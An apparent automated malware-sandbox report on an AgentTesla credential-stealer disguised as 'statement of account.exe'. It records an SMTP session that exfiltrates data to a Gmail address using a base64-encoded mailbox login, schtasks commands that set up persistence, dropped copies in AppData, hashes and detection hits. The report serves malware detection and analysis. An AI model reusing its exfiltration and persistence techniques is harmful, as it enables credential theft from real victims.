                                        Nov 29, 2022 15:02:04.363462925 CET49700587192.168.2.327.54.86.236AUTH login Y2xpcGpvaW50QGNsaXBqb2ludC5jby5ueg==
                                        Nov 29, 2022 15:02:04.584319115 CET5874970027.54.86.236192.168.2.3334 UGFzc3dvcmQ6
                                        Nov 29, 2022 15:02:04.818763018 CET5874970027.54.86.236192.168.2.3235 Authentication succeeded
                                        Nov 29, 2022 15:02:04.819016933 CET49700587192.168.2.327.54.86.236MAIL FROM:<clipjoint@clipjoint.co.nz>
                                        Nov 29, 2022 15:02:05.038481951 CET5874970027.54.86.236192.168.2.3250 OK
                                        Nov 29, 2022 15:02:05.043325901 CET49700587192.168.2.327.54.86.236RCPT TO:<geortiok4@gmail.com>
                                        Nov 29, 2022 15:02:05.261754990 CET5874970027.54.86.236192.168.2.3250 Accepted
                                        Nov 29, 2022 15:02:05.261979103 CET49700587192.168.2.327.54.86.236DATA
                                        Nov 29, 2022 15:02:05.480839968 CET5874970027.54.86.236192.168.2.3354 Enter message, ending with "." on a line by itself
                                        Nov 29, 2022 15:02:05.481442928 CET49700587192.168.2.327.54.86.236.
                                        Nov 29, 2022 15:02:06.095102072 CET49700587192.168.2.327.54.86.236.
                                        Nov 29, 2022 15:02:06.363890886 CET5874970027.54.86.236192.168.2.3250 OK id=1p01BV-0003na-Bt
                                        Nov 29, 2022 15:02:21.487787008 CET49698587192.168.2.327.54.86.236QUIT
                                        Nov 29, 2022 15:02:21.910847902 CET5874969827.54.86.236192.168.2.3221 cp-wc27.per01.ds.network closing connection

                                        Click to jump to process

                                        Target ID:0
                                        Start time:15:00:00
                                        Start date:29/11/2022
                                        Path:C:\Users\user\Desktop\statement of account.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\statement of account.exe
                                        Imagebase:0x7c0000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low

                                        Target ID:1
                                        Start time:15:00:12
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                                        Imagebase:0x310000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:2
                                        Start time:15:00:13
                                        Start date:29/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:3
                                        Start time:15:00:13
                                        Start date:29/11/2022
                                        Path:C:\Users\user\Desktop\statement of account.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xbd0000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        Target ID:4
                                        Start time:15:00:15
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        Imagebase:0x2f0000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 69%, ReversingLabs
                                        Reputation:low

                                        Target ID:14
                                        Start time:15:00:34
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
                                        Imagebase:0xa00000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 69%, ReversingLabs
                                        Reputation:low

                                        Target ID:15
                                        Start time:15:00:45
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe"
                                        Imagebase:0x240000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Target ID:16
                                        Start time:15:00:57
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                                        Imagebase:0x310000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:17
                                        Start time:15:00:57
                                        Start date:29/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:18
                                        Start time:15:00:58
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x180000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        Target ID:19
                                        Start time:15:00:59
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0xd10000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low

                                        Target ID:20
                                        Start time:15:01:02
                                        Start date:29/11/2022
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                                        Imagebase:0x310000
                                        File size:185856 bytes
                                        MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:21
                                        Start time:15:01:03
                                        Start date:29/11/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:22
                                        Start time:15:01:06
                                        Start date:29/11/2022
                                        Path:C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x640000
                                        File size:777216 bytes
                                        MD5 hash:808F76963A9F42AD7310A3B7D65C7983
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                        No disassembly